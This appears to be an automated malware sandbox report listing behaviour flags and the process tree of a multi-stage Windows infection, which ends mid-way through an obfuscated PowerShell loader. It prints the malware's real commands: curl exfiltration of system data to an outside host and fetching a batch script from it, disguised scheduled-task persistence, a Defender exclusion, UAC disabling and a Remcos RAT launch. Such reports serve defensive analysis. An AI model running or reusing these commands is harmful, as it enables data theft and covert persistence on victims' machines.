Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\9000Z5FCBIE3" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF027.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF027.tmp.bat
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\XTR9HDBSJMYU" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp2989.tmp"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IhIYpxIFcgyp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iGdgBFEJVNdXFn,[Parameter(Position=1)][Type]$cORkSOTPZP)$iSTiIuxtnsW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+'o'+'d'+'ule',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'le'+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+'i'+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+'toC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$iSTiIuxtnsW.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+'l'+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'eBy'+[Char](83)+''+'i'+'g'+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$iGdgBFEJVNdXFn).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+'g'+'e'+[Char](100)+'');$iSTiIuxtnsW.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e',''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+
[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+'e'+'w'+[Char](83)+'l'+[Char](111)+'t'+','+''+[Char](86)+'i'+'r'+''+'t'+'u'+[Char](97)+''+'l'+'',$cORkSOTPZP,$iGdgBFEJVNdXFn).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+'an'+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $iSTiIuxtnsW.CreateType();}$nlvkduqkZTZcW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'t'+[Char](101)+'m.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+'U'+[Char](110)+'sa'+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'tho'+'d'+''+'s'+'');$bgERocHrCpJknq=$nlvkduqkZTZcW.GetMethod(''+[Char](71)+'e'+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+'d'+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+'t'+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DTpbqLEALYnZDkiwoQJ=IhIYpxIFcgyp @([String])([IntPtr]);$ZGluQFTyjlPvCkISWArwNu=IhIYpxIFcgyp 
